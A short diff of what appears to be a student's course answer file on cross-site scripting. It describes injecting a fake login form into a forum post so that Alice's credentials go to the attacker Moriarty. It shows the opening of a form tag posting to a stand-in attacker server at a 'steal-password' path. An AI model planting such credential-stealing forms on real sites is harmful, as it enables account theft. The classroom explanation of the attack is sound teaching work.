luckybeulla/css_338/xss.md

 2. XSS attack that is more virulent than Moriarty's "turn something red" and "pop up a message" attacks.

    ***Moriarty could inject a fake login form into a post.
-When Alice views the post, she might this it is legitimae and try to login.
+When Alice views the post, she might think it is legitimae and try to login.
 Her username and password will then go to Moriarty instead of the real FDF server.***

   ```
   <form action="https://moriartys-server.com/steal-password" method="POST">